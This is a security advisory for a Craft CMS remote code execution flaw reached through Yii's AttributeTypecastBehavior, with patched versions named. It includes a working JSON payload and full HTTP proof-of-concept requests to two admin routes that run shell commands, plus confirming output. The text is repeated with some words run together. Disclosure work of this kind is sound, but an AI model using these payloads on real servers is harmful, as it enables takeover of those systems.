Note that you must have administrator access to the Craft Control Panel for this to work.
Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.
References:
6e608a1
27f5588
ec43c49
https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04
Summary
This was reported as a vulnerability in Yii framework on August 7th (https://github.com/yiisoft/yii2/security/advisories/GHSA-gcmh-9pjj-7fp4). The Yii framework team denies responsibility for this (placing the onus on application developers) and hence has not (and seemingly will not) provide a fix at the framework level. Hence, I am reporting this to Craft as I found it to affect the latest (5.6.0) version of Craft CMS.
Leveraging a legitimate but maliciously crafted Yii Behavior class, it’s possible to trigger Remote Code Execution (RCE) via Reflection when the tainted Behavior is attached to a Yii Component, and an event is also fired on the tainted Component.
Details
This vulnerability is inspired by CVE-2024-4990 but differs because a legitimate Yii Behavior class is used to abuse the magic __set() and __get() methods to trigger an arbitrary PHP callable, ultimately leading to RCE. As such, this bypasses the mitigations implemented for CVE-2024-4990 and the related CVE-2024-58136.
Using the as <behavior> syntax in JSON POST input, it’s possible to attach Behavior classes to Yii Components, which was the crux of the vulnerability identified in CVE-2024-4990. Fixes for that vulnerability and the related CVE-2024-58136 ensured that only classes of type Behavior could be attached to a Component. Craft CMS also implemented additional logic to prevent arbitrary Behavior classes from being attached to the vulnerable Component.
A new vulnerability has been identified that bypasses the fixes for the previous vulnerabilities by using a legitimate but specially crafted Behavior class, namely the yii\behaviors\AttributeTypecastBehavior. Attaching a Behavior of this type allows the attacker to define an arbitrary callable that is triggered if any event is fired on the tainted Component.
Using a wildcard event listener (specified as on * in JSON input) allows the attacker to catch any event called on the tainted Component and redirect the flow of control to call self::beforeSave of the AttributeTypecastBehavior, triggering the attacker-defined callable and resulting in RCE.
See the commented payload below:
{
"as xxx": {
"__class": "yii\\behaviors\\AttributeTypecastBehavior",
"__construct()": [
{
"attributeTypes": {
"typecastBeforeSave": ["Psy\\Readline\\Hoa\\ConsoleProcessus", "execute"] // Attacker defined callable
},
"typecastBeforeSave": "touch /tmp/touch" // Argument for the callable
}
]
},
"on *": "self::beforeSave" // When any event is fired on the Component, call beforeSave() of the AttributeTypecastBehavior to trigger the attacker-defined callable with the argument above
}This was found to affect two separate controllers/routes in Craft CMS admin functionality, though others may be affected:
- /index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings
- /index.php?p=admin%2Factions%2Ffields%2Frender-card-preview
PoC
- Install Craft CMS via Composer:
$ composer create-project "craftcms/craft" app
- Use the built-in server to launch Craft CMS:
$ ./craft serve 127.0.0.1:9090
- The following HTTP traces show the payload used to trigger the vulnerability on each of the vulnerable routes:
/index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings
POST /index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings&v=1763562868146 HTTP/1.1
Host: 127.0.0.1:9090
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:145.0) Gecko/20100101 Firefox/145.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:9090/admin/settings/categories/new
Content-Type: application/json
X-Requested-With: XMLHttpRequest
X-Registered-Asset-Bundles: 815d39ea,22e517a2,aee7f8dc,26c46c25,e505ffd6,6b4d7555,bb2f10a0,e5e48399,fc0bc163,1ccab40d,1e21896b,54698ee0,b842675b,1c3c9add,4b1fd285,d8d08e47,8f00ce04,8768f48b,cf3018d6,ec6d0256,eccadbb
X-Registered-Js-Files:
X-CSRF-Token: NElpp0FZTEyq2Yi4lyNbtvf5Qbtd3QIi8AUd4cJQjVKBFZrT8xSXNSuQHr269qyDYJm1hnoc98dlKRN1zAqj5r8hETtg8v1-rwd8YI-lJZxz_poluu6hCs2P6CRNu8yltOgF6vPsxT09sIund8NSBu4aocboYd0msvEcOWcT7sDsEWppVKyGSdPFMowzbbMBtBEwWz8F1AkjfAPB9NiL5HBs15C3LosCpHoXqEtehagy_Tfeff6QtVn8V1egfIjYz5jhAq6Btkklw6ZQESZG_z3F19sRKQwFxpgbzTZFULvHRKRDzP4XjYzHOKm5iR163amWgYw22pGIpA5f3_3LBIsoNqFxjJbbEo4R05ZSVldMl7jZSSQqMMbkObaaWuhwK_5q1m0B
Content-Length: 1787
Origin: http://127.0.0.1:9090
Connection: keep-alive
Cookie: CraftSessionId=b8veo0jao7aso9f9sas5irahcc; CRAFT_CSRF_TOKEN=f0a58b5c53676765154b56f4434bf49b7adac3eee76250658acfbb63999e3103a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22ovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C0b5b94bb740394a585337f1d087e4eeb1904ba802d27bf2d6a97fe35d30bda3bovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C1%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_identity=2c5abb45e65baee8d4fef5a873df2367ab1c42598a8937138bcba58593033d68a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_identity%22%3Bi%3A1%3Bs%3A162%3A%22%5B1%2C%22%5B%5C%22CdWbsSlpUey1DCRudhcod_xy0tXLc2oIHlOAeYLTAqOmF0rBIv2zaXQp4eg4AUBRc0qQr5G5wElj01yRXhojzuRZnPIW-GJqGo_U%5C%22%2Cnull%2C%5C%22961fe1815772f9207245de1a33ecd079%5C%22%5D%22%2C1209600%5D%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_username=28fa03238cbef8d3f349cde0ed37d8c62118163d18695ccdb5feec2a05906303a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar=expanded; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar-details=expanded
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
{"uid":"c295eb34-dd4c-42ac-8d07-1b8c872a126d","layoutConfig":{"uid":"08ef66f3-f69e-495b-882f-56834efab200","tabs":[{"name":"Content","uid":"6f1efe1c-2de5-4783-ab39-7ff9149a9c90","userCondition":null,"elementCondition":null,"elements":[{"type":"craft\\fieldlayoutelements\\TitleField","inputType":null,"autocomplete":false,"class":null,"size":null,"name":null,"autocorrect":true,"autocapitalize":true,"disabled":false,"readonly":false,"title":null,"placeholder":null,"step":null,"min":null,"max":null,"requirable":false,"id":null,"containerAttributes":[],"inputContainerAttributes":[],"labelAttributes":[],"orientation":null,"label":null,"instructions":null,"tip":null,"warning":null,"providesThumbs":false,"includeInCards":false,"width":100,"dateAdded":"2025-11-19T06:33:18-08:00","uid":"bae4dcd7-635b-41fe-96a3-4d3d69e91969","userCondition":null,"elementCondition":null},{"type":"craft\\fieldlayoutelements\\CustomField","handle":null,"label":null,"instructions":null,"tip":null,"warning":null,"required":false,"providesThumbs":false,"includeInCards":false,"width":100,"dateAdded":null,"uid":"c295eb34-dd4c-42ac-8d07-1b8c872a126d","userCondition":null,"elementCondition":null,"fieldUid":"12ac060b-8c40-48a6-b70f-94361245b149","editCondition":null}]}],"generatedFields":[],"cardView":[],"cardThumbAlignment":"end","type":"craft\\elements\\Category"},"elementType":"craft\\elements\\Category","config":{
"as xxx": {
"__class": "yii\\behaviors\\AttributeTypecastBehavior",
"__construct()": [
{
"attributeTypes": {
"typecastBeforeSave": ["Psy\\Readline\\Hoa\\ConsoleProcessus", "execute"]
},
"typecastBeforeSave": "touch /tmp/touch111"
}
]
},
"on *": "self::beforeSave"
},"settingsNamespace":null,"settings":null}
/index.php?p=admin%2Factions%2Ffields%2Frender-card-preview
POST /index.php?p=admin%2Factions%2Ffields%2Frender-card-preview&v=1763562868148 HTTP/1.1
Host: 127.0.0.1:9090
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:145.0) Gecko/20100101 Firefox/145.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:9090/admin/settings/categories/new
Content-Type: application/json
X-Requested-With: XMLHttpRequest
X-Registered-Asset-Bundles: 815d39ea,22e517a2,aee7f8dc,26c46c25,e505ffd6,6b4d7555,bb2f10a0,e5e48399,fc0bc163,1ccab40d,1e21896b,54698ee0,b842675b,1c3c9add,4b1fd285,d8d08e47,8f00ce04,8768f48b,cf3018d6,ec6d0256,eccadbb
X-Registered-Js-Files:
X-CSRF-Token: NElpp0FZTEyq2Yi4lyNbtvf5Qbtd3QIi8AUd4cJQjVKBFZrT8xSXNSuQHr269qyDYJm1hnoc98dlKRN1zAqj5r8hETtg8v1-rwd8YI-lJZxz_poluu6hCs2P6CRNu8yltOgF6vPsxT09sIund8NSBu4aocboYd0msvEcOWcT7sDsEWppVKyGSdPFMowzbbMBtBEwWz8F1AkjfAPB9NiL5HBs15C3LosCpHoXqEtehagy_Tfeff6QtVn8V1egfIjYz5jhAq6Btkklw6ZQESZG_z3F19sRKQwFxpgbzTZFULvHRKRDzP4XjYzHOKm5iR163amWgYw22pGIpA5f3_3LBIsoNqFxjJbbEo4R05ZSVldMl7jZSSQqMMbkObaaWuhwK_5q1m0B
Content-Length: 424
Origin: http://127.0.0.1:9090
Connection: keep-alive
Cookie: CraftSessionId=b8veo0jao7aso9f9sas5irahcc; CRAFT_CSRF_TOKEN=f0a58b5c53676765154b56f4434bf49b7adac3eee76250658acfbb63999e3103a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22ovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C0b5b94bb740394a585337f1d087e4eeb1904ba802d27bf2d6a97fe35d30bda3bovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C1%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_identity=2c5abb45e65baee8d4fef5a873df2367ab1c42598a8937138bcba58593033d68a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_identity%22%3Bi%3A1%3Bs%3A162%3A%22%5B1%2C%22%5B%5C%22CdWbsSlpUey1DCRudhcod_xy0tXLc2oIHlOAeYLTAqOmF0rBIv2zaXQp4eg4AUBRc0qQr5G5wElj01yRXhojzuRZnPIW-GJqGo_U%5C%22%2Cnull%2C%5C%22961fe1815772f9207245de1a33ecd079%5C%22%5D%22%2C1209600%5D%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_username=28fa03238cbef8d3f349cde0ed37d8c62118163d18695ccdb5feec2a05906303a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar=expanded; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar-details=expanded
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
{"fieldLayoutConfig":{
"as xxx": {
"__class": "yii\\behaviors\\AttributeTypecastBehavior",
"__construct()": [
{
"attributeTypes": {
"typecastBeforeSave": ["Psy\\Readline\\Hoa\\ConsoleProcessus", "execute"]
},
"typecastBeforeSave": "touch /tmp/touch222"
}
]
},
"on *": "self::beforeSave"
},"cardElements":[],"showThumb":null,"thumbAlignment":"end"}
- Check the filesystem to confirm the creation of the two files in
/tmp and hence confirm RCE:
$ ls -la /tmp/
...
-rw-rw-r-- 1 calum calum 0 Nov 19 16:05 touch111
-rw-rw-r-- 1 calum calum 0 Nov 19 16:05 touch222
Impact
An attacker with access to Craft CMS admin functionality, specifically the routes listed above, can trigger RCE on the backend server and potentially gain control of the server.
Note that you must have administrator access to the Craft Control Panel for this to work.
Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.
References:
6e608a1
27f5588
ec43c49
https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04
Summary
This was reported as a vulnerability in Yii framework on August 7th (https://github.com/yiisoft/yii2/security/advisories/GHSA-gcmh-9pjj-7fp4). The Yii framework team denies responsibility for this (placing the onus on application developers) and hence has not (and seemingly will not) provide a fix at the framework level. Hence, I am reporting this to Craft as I found it to affect the latest (
5.6.0) version of Craft CMS.Leveraging a legitimate but maliciously crafted Yii
Behaviorclass, it’s possible to trigger Remote Code Execution (RCE) via Reflection when the taintedBehavioris attached to a YiiComponent, and an event is also fired on the taintedComponent.Details
This vulnerability is inspired by
CVE-2024-4990but differs because a legitimate YiiBehaviorclass is used to abuse the magic__set()and__get()methods to trigger an arbitrary PHP callable, ultimately leading to RCE. As such, this bypasses the mitigations implemented forCVE-2024-4990and the relatedCVE-2024-58136.Using the
as <behavior>syntax in JSON POST input, it’s possible to attachBehaviorclasses to YiiComponents, which was the crux of the vulnerability identified inCVE-2024-4990. Fixes for that vulnerability and the relatedCVE-2024-58136ensured that only classes of typeBehaviorcould be attached to aComponent. Craft CMS also implemented additional logic to prevent arbitraryBehaviorclasses from being attached to the vulnerableComponent.A new vulnerability has been identified that bypasses the fixes for the previous vulnerabilities by using a legitimate but specially crafted
Behaviorclass, namely theyii\behaviors\AttributeTypecastBehavior. Attaching aBehaviorof this type allows the attacker to define an arbitrary callable that is triggered if any event is fired on the taintedComponent.Using a wildcard event listener (specified as
on *in JSON input) allows the attacker to catch any event called on the taintedComponentand redirect the flow of control to callself::beforeSaveof theAttributeTypecastBehavior, triggering the attacker-defined callable and resulting in RCE.See the commented payload below:
{ "as xxx": { "__class": "yii\\behaviors\\AttributeTypecastBehavior", "__construct()": [ { "attributeTypes": { "typecastBeforeSave": ["Psy\\Readline\\Hoa\\ConsoleProcessus", "execute"] // Attacker defined callable }, "typecastBeforeSave": "touch /tmp/touch" // Argument for the callable } ] }, "on *": "self::beforeSave" // When any event is fired on the Component, call beforeSave() of the AttributeTypecastBehavior to trigger the attacker-defined callable with the argument above }This was found to affect two separate controllers/routes in Craft CMS admin functionality, though others may be affected:
PoC
/index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings
/index.php?p=admin%2Factions%2Ffields%2Frender-card-preview
/tmpand hence confirm RCE:Impact
An attacker with access to Craft CMS admin functionality, specifically the routes listed above, can trigger RCE on the backend server and potentially gain control of the server.